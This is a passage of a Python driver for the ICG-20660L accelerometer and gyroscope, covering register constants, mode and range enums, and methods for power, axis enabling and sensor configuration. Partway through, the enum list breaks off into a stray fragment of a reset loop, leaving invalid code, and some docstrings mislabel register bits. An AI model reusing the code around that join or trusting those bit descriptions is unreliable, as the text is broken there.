YA_ST | ZA_ST | ACCEL_FS_SEL | rsv |\n # -------------------------------------------------------\n '''\n BIT_XA_ST = 7\n OFFSET_XA_ST = 0x01\n BIT_YA_ST = 6\n OFFSET_YA_ST = 0x01\n BIT_ZA_ST = 5\n OFFSET_ZA_ST = 0x01\n BIT_ACCEL_FS_SEL = 3\n OFFSET_ACCEL_FS_SEL = 0x03\n \n REG_ICG20660L_LP_MODE_CFG = 0x1E\n REG_ICG20660L_ACCEL_WOM_THR = 0x1F\n REG_ICG20660L_FIFO_EN = 0x23\n '''\n #FIFO_EN register:addr:0x23,acess:rw\n # --------------------------------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # --------------------------------------------------------------------------------------\n # | TEMP_FIFO_EN | XG_FIFO_EN | YG_FIFO_EN | ZG_FIFO_EN | ACCEL_FIFO_EN | rsv |\n # --------------------------------------------------------------------------------------\n '''\n BIT_TEMP_FIFO_EN = 7\n OFFSET_TEMP_FIFO_EN = 0x01\n BIT_XG_FIFO_EN = 6\n OFFSET_XG_FIFO_EN = 0x01\n BIT_YG_FIFO_EN = 5\n OFFSET_YG_FIFO_EN = 0x01\n BIT_ZG_FIFO_EN = 4\n OFFSET_ZG_FIFO_EN = 0x01\n BIT_ACCEL_FIFO_EN = 3\n OFFSET_ACCEL_FIFO_EN = 0x01\n\n REG_ICG20660L_FSYNC_INT = 0x36\n REG_ICG20660L_INT_PIN_CFG = 0x37\n '''\n #INT_PIN_CFG register:addr:0x37,acess:rw\n # ------------------------------------------------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # ------------------------------------------------------------------------------------------------------\n # | INT_LEVEL | INT_OPEN | LATCH_INT_EN | INT_RD_CLEAR | FSYNC_INT_LEVEL | FSYNC_INT_MODE_EN | rsv |\n # ------------------------------------------------------------------------------------------------------\n '''\n BIT_INT_LEVEL = 7\n OFFSET_INT_LEVEL = 0x01\n BIT_INT_OPEN = 6\n OFFSET_INT_OPEN = 0x01\n BIT_LATCH_INT_EN = 5\n OFFSET_LATCH_INT_EN = 0x01\n BIT_INT_RD_CLEAR = 4\n OFFSET_INT_RD_CLEAR = 0x01\n BIT_FSYNC_INT_LEVEL = 3\n OFFSET_FSYNC_INT_LEVEL = 0x01\n BIT_FSYNC_INT_MODE_EN = 2\n OFFSET_FSYNC_INT_MODE_EN = 0x01\n \n REG_ICG20660L_INT_STATUS = 0x3A\n REG_ICG20660L_ACCEL_XOUT_H = 0x3B\n REG_ICG20660L_ACCEL_XOUT_L = 0x3C\n REG_ICG20660L_ACCEL_YOUT_H = 0x3D\n REG_ICG20660L_ACCEL_YOUT_L = 0x3E\n REG_ICG20660L_ACCEL_ZOUT_H = 0x3F\n REG_ICG20660L_ACCEL_ZOUT_L = 0x40\n REG_ICG20660L_TEMP_OUT_H = 0x41\n REG_ICG20660L_TEMP_OUT_L = 0x42\n REG_ICG20660L_GYRO_XOUT_H = 0x43\n REG_ICG20660L_GYRO_XOUT_L = 0x44\n REG_ICG20660L_GYRO_YOUT_H = 0x45\n REG_ICG20660L_GYRO_YOUT_L = 0x46\n REG_ICG20660L_GYRO_ZOUT_H = 0x47\n REG_ICG20660L_GYRO_ZOUT_L = 0x48\n REG_ICG20660L_SIGNAL_PATH_RESET = 0x68\n REG_ICG20660L_ACCEL_INTEL_CTRL = 0x69\n '''\n #ACCEL_INTEL_CTRL register:addr:0x69,acess:rw\n # ----------------------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # ----------------------------------------------------------------------------\n # | ACCEL_INTEL_EN | ACCEL_INTEL_MODE | rsv | WOM_TH_MODE |\n # ----------------------------------------------------------------------------\n '''\n BIT_ACCEL_INTEL_EN = 7\n OFFSET_ACCEL_INTEL_EN = 0x01\n BIT_ACCEL_INTEL_MODE = 6\n OFFSET_ACCEL_INTEL_MODE = 0x01\n BIT_WOM_TH_MODE = 0\n OFFSET_WOM_TH_MODE = 0x01\n \n REG_ICG20660L_USER_CTRL = 0x6A\n '''\n #USER_CTRL register:addr:0x6A,acess:rw\n # -------------------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -------------------------------------------------------------------------\n # | rsv | FIFO_EN | rsv | I2C_IF_DIS | rsv | FIFO_RST | rsv | SIG_COND_RST|\n # -------------------------------------------------------------------------\n '''\n BIT_FIFO_EN = 6\n OFFSET_FIFO_EN = 0x01\n BIT_I2C_IF_DIS = 4\n OFFSET_I2C_IF_DIS = 0x01\n BIT_FIFO_RST = 2\n OFFSET_FIFO_RST = 0x01\n BIT_SIG_COND_RST = 0\n OFFSET_SIG_COND_RST = 0x01\n \n REG_ICG20660L_WHO_AM_I = 0x75\n REG_ICG20660L_XA_OFFSET_H = 0x77\n REG_ICG20660L_XA_OFFSET_L = 0x78\n REG_ICG20660L_YA_OFFSET_H = 0x7A\n REG_ICG20660L_YA_OFFSET_L = 0x7B\n REG_ICG20660L_ZA_OFFSET_H = 0x7D\n REG_ICG20660L_ZA_OFFSET_L = 0x7E\n \n RAW_DATA_AX_H_INDEX = 0x00\n RAW_DATA_AX_L_INDEX = 0x01\n RAW_DATA_AY_H_INDEX = 0x02\n RAW_DATA_AY_L_INDEX = 0x03\n RAW_DATA_AZ_H_INDEX = 0x04\n RAW_DATA_AZ_L_INDEX = 0x05\n RAW_DATA_T_H_INDEX = 0x06\n RAW_DATA_T_L_INDEX = 0x07\n RAW_DATA_GX_H_INDEX = 0x08\n RAW_DATA_GX_L_INDEX = 0x09\n RAW_DATA_GY_H_INDEX = 0x0A\n RAW_DATA_GY_L_INDEX = 0x0B\n RAW_DATA_GZ_H_INDEX = 0x0C\n RAW_DATA_GZ_L_INDEX = 0x0D\n RAW_DATA_LENGTH = 14\n \n ICG20660L_WOM_XYZ_INT = 7 << 5\n \n BIT_FIFO_LOW_EN = 7\n OFFSET_FIFO_LOW_EN = 0x01\n BIT_TEMP = 6\n OFFSET_TEMP = 0x01\n BIT_ACCEL_X = 5\n OFFSET_ACCEL_X = 0x01\n BIT_ACCEL_Y = 4\n OFFSET_ACCEL_Y = 0x01\n BIT_ACCEL_Z = 3\n OFFSET_ACCEL_Z = 0x01\n BIT_GYRO_X = 2\n OFFSET_GYRO_X = 0x01\n BIT_GYRO_Y = 1\n OFFSET_GYRO_Y = 0x01\n BIT_GYRO_Z = 0\n OFFSET_GYRO_Z = 0x01\n\n _data_mode = 0\n _mode = 2\n _level = GPIO.LOW\n _fifo_frame_size = 0\n _accel_scale = ADC_MAX_RANGE/ACCEL_FULL_SCALE_16G\n _accel_range = ACCEL_FULL_SCALE_16G\n _gyro_scale = ADC_MAX_RANGE/GYRO_FULL_SCALE_500DPS\n _gyro_range = GYRO_FULL_SCALE_500DPS\n _raw_data = [0]*14\n _update = 0\n\n ## gyro: off, accel:off, low power consumption about 70uA\n eSLEEP_MODE = 0 \n ## gyro: off, accel:duty_cycled, consumption about 1.5mA \n eACCEL_LOW_POWER_MODE = 1 \n ## gyro: on, accel:on, consumption about 3.3mA\n eSIX_AXIS_LOW_NOISE_MODE = 2 \n \n ## Read sensor data from data register.\n eREG_MODE = 0 \n ## Read sensor data from 512 bytes FIFO.\n eFIFO_MODE = 1 \n \n ## The full scale range of gyro: 0~±125dps, 1dps = Π/180° rad/s, Π = 3.1415926.\n eFSR_G_125DPS = 0 \n ## The full scale range of gyro: 0~±250dps, 1dps = Π/180° rad/s, Π = 3.1415926.\n eFSR_G_250DPS = 1 \n ## The full scale range of gyro: 0~±500dps, 1dps = Π/180° rad/s, Π = 3.1415926. \n eFSR_G_500DPS = 2 \n \n ## The full scale range of accel: 0~±2g, 1g = 9.80665 m/s².\n eFSR_A_2G = 0 \n ## The full scale range of accel: 0~±4g, 1g = 9.80665 m/s². \n eFSR_A_4G = 1 \n ## The full scale range of accel: 0~±8g, 1g = 9.80665 m/s². \n eFSR_A_8G = 2 \n ## The full scale range of accel: 0~±16g, 1g = 9.80665 m/s².\n eFSR_A_16G = 3 \n \n ## The bit is gyro's z axis, you can call enableSensor or disableSensor function to enable or disable the gyro's Z axis.\n eGYRO_AXIS_Z = 1 << 6 | 1 << 0 \n ## The bit is gyro's y axis, you can call enableSensor or disableSensor function to enable or disable the gyro's Y axis. \n eGYRO_AXIS_Y = 1 << 6 | 1 << 1 \n ## The bit is gyro's z axis, you can call enableSensor or disableSensor function to enable or disable the gyro's X axis. \n eGYRO_AXIS_X = 1 << 6 | 1 << 2 \n ## The bit is accel's z axis, you can call enableSensor or disableSensor function to enable or disable the accel's Z axis. \n eACCEL_AXIS_Z = 3 \n ## The bit is accel's Y axis, you can call enableSensor or disableSensor function to enable or disable the accel's Y axis. \n eACCEL_AXIS_Y = 4\n ## The bit is accel's X axis, you can call enableSensor or disableSensor function to enable or disable the accel's X axis. \n eACCEL_AXIS_X = 5 \n ## The bits of gyro's xyz axis, you can call enableSensor or disableSensor function to enable or disable the gyro's xyz axis. \n eGYRO_AXIS_XYZ = 1 << 6 | 0X07 \n ## The bits of accel's xyz axis, you can call enableSensor or disableSensor function to enable or disable the accel's xyz axis. \n eACCEL_AXIS_XYZ = 0X07 << 3 \n ## The gryo's and accel's xyz axis, you can call enableSensor or disableSensor function to enable or disable the accel's and gyro's xyz axis. \n eAXIS_ALL = 1 << 6 | 0X3F \n ## The bits of six-axis temperature, you can call enableSensor or disableSensor function to enable or disable the temperature. \n eTEMPERATURE = 1 << 6 \n ## The bits of fifo low power enable bit. \n eFIFO_LOW_POWER_EN = 1<< 7 \n \n ## When the signal is equal to or greater than 8173Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 32KHz.\n eGYRO_DLPF_8173_32KHZ = 0 \n ## When the signal is equal to or greater than 3281Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 32KHz.\n eGYRO_DLPF_3281_32KHZ = 1 \n ## When the signal is equal to or greater than 250Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 8KHz.\n eGYRO_DLPF_250_8KHZ = 2 \n ## When the signal is equal to or greater than 176Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz\n eGYRO_DLPF_176_1KHZ = 3 \n ## When the signal is equal to or greater than 92Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eGYRO_DLPF_92_1KHZ = 4 \n ## When the signal is equal to or greater than 3281Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 8KHz.\n eGYRO_DLPF_3281_8KHZ = 5 \n \n ## When the signal is less than or equal to 5Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_5_1KHZ = 0 \n ## When the signal is less than or equal to 10Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_10_1KHZ = 1 \n ## When the signal is less than or equal to 21Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_21_1KHZ = 2 \n ## When the signal is less than or equal to 44Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_44_1KHZ = 3 \n ## When the signal is less than or equal to 99Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_99_1KHZ = 4 \n ## This configuration also supports low power consumption. When the signal is less than or equal to 218Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz. \n eACCEL_DLPF_218_1KHZ = 5 \n ## This configuration also supports low power consumption. When the signal is less than or equal to 420Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_420_1KHZ = 6 \n ## This configuration also supports low power consumption. When the signal is less than or equal to 1046Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_1046_4KHZ = 7 \n ## This configuration only supports low power consumption. When the signal is less than or equal to 55Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n eACCEL_DLPF_55_1KHZ = 8 \n ## This configuration only supports low power consumption. When the signal is less than or equal to 110Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz. \n eACCEL_DLPF_110_1KHZ = 9 \n \n ## the low power accel Output Data Rate: 0.24Hz\n eODR_0_24HZ = 0 \n ## the low power accel Output Data Rate: 0.49Hz\n eODR_0_49HZ = 1 \n ## the low power accel Output Data Rate: 0.98Hz\n eODR_0_98HZ = 2 \n ## the low power accel Output Data Rate: 1.95Hz\n eODR_1_95HZ = 3 \n ## the low power accel Output Data Rate: 3.91Hz \n eODR_3_91HZ = 4 \n ## the low power accel Output Data Rate: 7.81Hz \n eODR_7_81HZ = 5 \n ## the low power accel Output Data Rate: 15.63Hz\n eODR_15_63HZ = 6 \n ## the low power accel Output Data Rate: 31.25Hz \n eODR_31_25HZ = 7 \n ## the low power accel Output Data Rate: 62.50Hz\n eODR_62_50HZ = 8 \n ## the low power accel Output Data Rate: 125Hz\n eODR_125HZ = 9 \n ## the low power accel Output Data Rate: 250Hz \n eODR_250HZ = 10 \n ## = wait_for_timeout_ms:\n break\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 1)\n if len(rslt) == 1:\n if self._get_reg_bit_value(rslt[0], self.BIT_DEVICE_RESET, self.OFFSET_DEVICE_RESET) == 0:\n break\n \n \n def sleep(self):\n '''!\n @brief Enter sleep mode, it will reduce power consumption, and The gyroscope and acceleration will stop working. \n @n You need to call wakeup function to wake up sensor.\n '''\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 1)\n if len(rslt) == 1:\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_SLEEP, self.OFFSET_SLEEP, 1)\n else:\n return None\n self._write_bytes(self.REG_ICG20660L_PWR_MGMT_1, [rslt])\n time.sleep(0.1)\n\n def wakeup(self):\n '''!\n @brief Waking up sensor from sleep, and you will restore the configuration before sleep.\n '''\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 1)\n #print(\"rslt=%#x\"%rslt[0])\n if len(rslt) == 1:\n rslt = self._update_reg_bit_value(rslt[0], self.BIT_SLEEP, self.OFFSET_SLEEP, 0)\n #print(\"rslt=%#x\"%rslt)\n else:\n return None\n \n self._write_bytes(self.REG_ICG20660L_PWR_MGMT_1, [rslt])\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 1)\n #print(\"rslt=%#x\"%rslt[0])\n time.sleep(1)\n\n def enable_sensor(self, bit):\n '''!\n @brief Enable sensor, including Accel of xyz axis, Gyro of xyz, temperature and fifo low power enable bit. \n @param bit: 8-bit byte data. Each bit represents enabling a function bit, as shown in the following table:\n @n -------------------------------------------------------------------------------------------------------------------\n @n | bit7 | bit6 | bit5 | bit4 | bit3 | bit2 | bit1 | bit0 |\n @n -------------------------------------------------------------------------------------------------------------------\n @n | reserve | reserve |eACCEL_AXIS_X|eACCEL_AXIS_Y|eACCEL_AXIS_Z|eGYRO_AXIS_X|eGYRO_AXIS_Y|eGYRO_AXIS_Z|\n @n | | eACCEL_AXIS_XYZ | eGYRO_AXIS_XYZ |\n @n | | eAXIS_ALL |\n @n -------------------------------------------------------------------------------------------------------------------\n @n bit0: Z-axis of gyro and temperature.\n @n bit1: Y-axis of gyro and temperature.\n @n bit2: X-axis of gyro and temperature.\n @n bit3: Z-axis of acceleration.\n @n bit4: Z-axis of acceleration.\n @n bit5: Z-axis of acceleration.\n @n bit6: reserve.\n @n bit7: reserve.\n @note Enabling any axis of the gyroscope will automatically enable the on-board temperature sensor.\n @n eGYRO_AXIS_Z: The bit0 of the bit, enable gyro's z axis and temperature.\n @n eGYRO_AXIS_Y: The bit1 of the bit, enable gyro's y axis and temperature.\n @n eGYRO_AXIS_X: The bit2 of the bit, enable gyro's X axis and temperature.\n @n eACCEL_AXIS_Z: The bit3 of the bit, enable accel's z axis.\n @n eACCEL_AXIS_Y: The bit4 of the bit, enable Accel's y axis.\n @n eACCEL_AXIS_X: The bit5 of the bit, enable Accel's X axis.\n @n eGYRO_AXIS_XYZ or eGYRO_AXIS_X|eGYRO_AXIS_Y|eGYRO_AXIS_Z: The bit0/bit1/bit2 of the bit, enable gyro's xyz axis and temperature.\n @n eACCEL_AXIS_XYZ or eACCEL_AXIS_X|eACCEL_AXIS_Y|eACCEL_AXIS_Z: The bit3/bit4/bit5 of the bit, enable Accel's xyz axis.\n @n eAXIS_ALL or eGYRO_AXIS_Z|eGYRO_AXIS_Y|eGYRO_AXIS_X|eACCEL_AXIS_Z|eACCEL_AXIS_Y|eACCEL_AXIS_Z: The bit0/bit1/bit2/bit3/bit4/bit5 of the bit, enable temperature, Accel's and gyro's xyz axis. \n '''\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 2)\n #print(\"REG_ICG20660L_PWR_MGMT_1=%#X\"%rslt[0])\n #print(\"REG_ICG20660L_PWR_MGMT_2=%#X\"%rslt[1])\n if len(rslt) == 2:\n if self._get_reg_bit_value(bit, self.BIT_FIFO_LOW_EN, self.OFFSET_FIFO_LOW_EN):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_FIFO_LP_EN, self.OFFSET_FIFO_LP_EN, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_TEMP, self.OFFSET_TEMP):\n rslt[0] = self._update_reg_bit_value(rslt[0], self.BIT_TEMP_DIS, self.OFFSET_TEMP_DIS, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_ACCEL_X, self.OFFSET_ACCEL_X):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_XA, self.OFFSET_STBY_XA, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_ACCEL_Y, self.OFFSET_ACCEL_Y):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_YA, self.OFFSET_STBY_YA, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_ACCEL_Z, self.OFFSET_ACCEL_Z):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_ZA, self.OFFSET_STBY_ZA, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_GYRO_X, self.OFFSET_GYRO_X):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_XG, self.OFFSET_STBY_XG, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_GYRO_Y, self.OFFSET_GYRO_Y):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_YG, self.OFFSET_STBY_YG, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_GYRO_Z, self.OFFSET_GYRO_Z):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_ZG, self.OFFSET_STBY_ZG, 0)\n \n if self._data_mode == self.eFIFO_MODE:\n self._enable_fifo(True, True, True, True, True)\n else:\n self._enable_fifo(False, False, False, False, False)\n self._write_bytes(self.REG_ICG20660L_PWR_MGMT_1, rslt)\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 2)\n #print(\"REG_ICG20660L_PWR_MGMT_2=%#X\"%rslt[1])\n #print(\"REG_ICG20660L_PWR_MGMT_1=%#X\"%rslt[0])\n\n def disable_sensor(self, bit):\n '''!\n @brief Disable sensor, including Accel of xyz axis, Gyro of xyz, temperature and fifo low power enable bit. \n @param bit: 8-bit byte data. Each bit represents enabling a function bit, as shown in the following table:\n @n -------------------------------------------------------------------------------------------------------------------\n @n | bit7 | bit6 | bit5 | bit4 | bit3 | bit2 | bit1 | bit0 |\n @n -------------------------------------------------------------------------------------------------------------------\n @n | reserve | reserve |eACCEL_AXIS_X|eACCEL_AXIS_Y|eACCEL_AXIS_Z|eGYRO_AXIS_X|eGYRO_AXIS_Y|eGYRO_AXIS_Z|\n @n | | eACCEL_AXIS_XYZ | eGYRO_AXIS_XYZ |\n @n | | eAXIS_ALL |\n @n -------------------------------------------------------------------------------------------------------------------\n @n bit0: Z-axis of gyro and temperature.\n @n bit1: Y-axis of gyro and temperature.\n @n bit2: X-axis of gyro and temperature.\n @n bit3: Z-axis of acceleration.\n @n bit4: Z-axis of acceleration.\n @n bit5: Z-axis of acceleration.\n @n bit6: reserve.\n @n bit7: reserve.\n @note Only when the X, Y, and Z axes of the gyroscope are all closed, the temperature sensor will be turned off.\n @n Any axis’s turning on will make the temperature sensor not be turned off.\n @n eGYRO_AXIS_Z: The bit0 of the bit, disable gyro's z axis and temperature.\n @n eGYRO_AXIS_Y: The bit1 of the bit, disable gyro's y axis and temperature.\n @n eGYRO_AXIS_X: The bit2 of the bit, disable gyro's X axis and temperature.\n @n eACCEL_AXIS_Z: The bit3 of the bit, disable accel's z axis.\n @n eACCEL_AXIS_Y: The bit4 of the bit, disable Accel's y axis.\n @n eACCEL_AXIS_X: The bit5 of the bit, disable Accel's X axis.\n @n eGYRO_AXIS_XYZ or eGYRO_AXIS_X|eGYRO_AXIS_Y|eGYRO_AXIS_Z: The bit0/bit1/bit2 of the bit, disable gyro's xyz axis and temperature.\n @n eACCEL_AXIS_XYZ or eACCEL_AXIS_X|eACCEL_AXIS_Y|eACCEL_AXIS_Z: The bit3/bit4/bit5 of the bit, disable Accel's xyz axis.\n @n eAXIS_ALL or eGYRO_AXIS_Z|eGYRO_AXIS_Y|eGYRO_AXIS_X|eACCEL_AXIS_Z|eACCEL_AXIS_Y|eACCEL_AXIS_Z: The bit0/bit1/bit2/bit3/bit4/bit5 of the bit, disable temperature, Accel's and gyro's xyz axis. \n '''\n rslt = self._read_bytes(self.REG_ICG20660L_PWR_MGMT_1, 2)\n if self._get_reg_bit_value(bit, self.BIT_FIFO_LOW_EN, self.OFFSET_FIFO_LOW_EN):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_FIFO_LP_EN, self.OFFSET_FIFO_LP_EN, 0)\n\n if self._get_reg_bit_value(bit, self.BIT_TEMP, self.OFFSET_TEMP):\n rslt[0] = self._update_reg_bit_value(rslt[0], self.BIT_TEMP_DIS, self.OFFSET_TEMP_DIS, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_ACCEL_X, self.OFFSET_ACCEL_X):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_XA, self.OFFSET_STBY_XA, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_ACCEL_Y, self.OFFSET_ACCEL_Y):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_YA, self.OFFSET_STBY_YA, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_ACCEL_Z, self.OFFSET_ACCEL_Z):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_ZA, self.OFFSET_STBY_ZA, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_GYRO_X, self.OFFSET_GYRO_X):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_XG, self.OFFSET_STBY_XG, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_GYRO_Y, self.OFFSET_GYRO_Y):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_YG, self.OFFSET_STBY_YG, 1)\n\n if self._get_reg_bit_value(bit, self.BIT_GYRO_Z, self.OFFSET_GYRO_Z):\n rslt[1] = self._update_reg_bit_value(rslt[1], self.BIT_STBY_ZG, self.OFFSET_STBY_ZG, 1)\n \n if self._data_mode == self.eFIFO_MODE:\n self._enable_fifo(True, True, True, True, True)\n else:\n self._enable_fifo(False, False, False, False, False)\n if (self._get_reg_bit_value(rslt[1], self.BIT_GYRO_X, self.OFFSET_GYRO_X) == 0) or (self._get_reg_bit_value(rslt[1], self.BIT_GYRO_Z, self.OFFSET_GYRO_Z) == 0) or (self._get_reg_bit_value(rslt[1], self.BIT_GYRO_Y, self.OFFSET_GYRO_Y) == 0):\n rslt[0] = self._update_reg_bit_value(rslt[0], self.BIT_TEMP_DIS, self.OFFSET_TEMP_DIS, 0)\n\n self._write_bytes(self.REG_ICG20660L_PWR_MGMT_1, rslt)\n\n def config_accel(self,scale, bd, odr = 0, low_power_flag = False):\n '''!\n @brief Config of accel's full scale, dlpf bandwidth and internal sample rate. \n @param scale The full scale of accel, unit: g(1g = 9.80665 m/s²).\n @n eFSR_A_2G: The full scale range is ±2g.\n @n eFSR_A_4G: The full scale range is ±4g.\n @n eFSR_A_8G: The full scale range is ±8g.\n @n eFSR_A_16G: The full scale range is ±16g.\n @param bd Set 3-db bandwidth.\n @n eACCEL_DLPF_5_1KHZ or 0: When the signal is less than or equal to 5Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n @n eACCEL_DLPF_10_1KHZ or 1: When the signal is less than or equal to 10Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n @n eACCEL_DLPF_21_1KHZ or 2: When the signal is less than or equal to 21Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n @n eACCEL_DLPF_44_1KHZ or 3: When the signal is less than or equal to 44Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n @n eACCEL_DLPF_99_1KHZ or 4: When the signal is less than or equal to 99Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n @n eACCEL_DLPF_218_1KHZ or 5: When the signal is less than or equal to 218Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz. @n Support low power consumption mode\n @n eACCEL_DLPF_420_1KHZ or 6: When the signal is less than or equal to 420Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz. @n Support low power consumption mode\n @n eACCEL_DLPF_1046_4KHZ or 7: When the signal is less than or equal to 1046Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 4KHz. @n Support low power consumption mode\n @n eACCEL_DLPF_55_1KHZ or 8: When the signal is less than or equal to 55Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz. @n Only support low power consumption mode\n @n eACCEL_DLPF_110_1KHZ or 9: When the signal is less than or equal to 110Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz. @n Only support low power consumption mode\n @note When the gyroscope and accelerometer are both enabled, if the sensor data is read through the FIFO,\n @n the internal sampling rate of the gyroscope and accelerometer must be the same.\n @param odr: Set the frequency of waking up the chip to take a sample of accel data – the low power accel Output Data Rate.\n @n eODR_125HZ or 9: The low power accel Output Data Rate: 125Hz\n @n eODR_250HZ or 10: The low power accel Output Data Rate: 250Hz\n @n eODR_500HZ or 11: The low power accel Output Data Rate: 500Hz\n @param low_power_flag: Whether to configure the Acceleration to low power mode.\n @n True: Enter low power mode.\n @n False: Not configure the Acceleration to low power mode.(default)\n '''\n if low_power_flag:\n self._mode = self.eACCEL_LOW_POWER_MODE\n else:\n self._mode = self.eSIX_AXIS_LOW_NOISE_MODE\n self._set_full_scale_for_accel(scale)\n self._set_bandwidth_for_accel(bd)\n self._write_bytes(self.REG_ICG20660L_LP_MODE_CFG, [odr])\n\n def config_gyro(self, scale, bd):\n '''!\n @brief Config of gyro's full scale, dlpf bandwidth and internal sample rate. \n @param scale The full scale of gyro, unit: dps(Degrees per second).\n @n eFSR_G_125DPS: The full scale range is ±125 dps.\n @n eFSR_G_250DPS: The full scale range is ±250 dps.\n @n eFSR_G_500DPS: The full scale range is ±500 dps.\n @param bd Set 3-db bandwidth.\n @n eGYRO_DLPF_8173_32KHZ: When the signal is equal to or greater than 8173Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 32KHz.\n @n eGYRO_DLPF_3281_32KHZ: When the signal is equal to or greater than 3281Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 32KHz.\n @n eGYRO_DLPF_250_8KHZ: When the signal is equal to or greater than 250Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 8KHz.\n @n eGYRO_DLPF_176_1KHZ: When the signal is equal to or greater than 176Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n @n eGYRO_DLPF_92_1KHZ: When the signal is equal to or greater than 92Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 1KHz.\n @n eGYRO_DLPF_3281_8KHZ: When the signal is equal to or greater than 3281Hz, there will be obvious attenuation, 3-db attenuation, and the internal sampling rate is 8KHz.\n @note When the gyroscope and accelerometer are both enabled, if the sensor data is read through the FIFO, \n @n the internal sampling rate of the gyroscope and accelerometer must be the same.\n '''\n self._set_full_scale_for_gyro(scale)\n self._set_bandwidth_for_gyro(bd)\n\n\n def set_sample_div(self, div):\n '''!\n @brief Set sample rate divider. \n @param div Sample rate divider, the range is 0~255.\n @n Sampling rate = internal sampling rate/(div+1)\n @note If the accelerometer configuration is in low power consumption mode, that is, the formal parameter lowPowerFlag of the configAccel function is true, \\\n @n the sampling rate must match the output rate of the formal parameter odr of configAccel, as shown in the following table:\n @n ----------------------------------------------------------------------------\n @n | config_accel | set_sample_div |\n @n ----------------------------------------------------------------------------|\n @n | bd | odr | lowPowerFlag | div |\n @n ----------------------------------------------------------------------------|\n @n | X | X | false | 0~255 |\n @n ----------------------------------------------------------------------------|\n @n | | eODR_125Hz | true | 7 |\n @n | |-----------------------------------------------|\n @n |bd of supporting low power | eODR_250Hz | true | 3 |\n @n |consumption mode |-----------------------------------------------|\n @n | | eODR_500Hz | true | 1 |\n @n |---------------------------------------------------------------------------|\n '''\n div &= 0xff\n self._write_bytes(self.REG_ICG20660L_SMPLRT_DIV, [div])\n\n def get_raw_data(self, length = 0):\n '''!\n @brief Get 14 bytes raw data, including accel, gyro and temperature.\n @param length: The length of returning list.\n @return data: list type, buffer for storing 14 bytes of raw data\n @n The first byte of data : 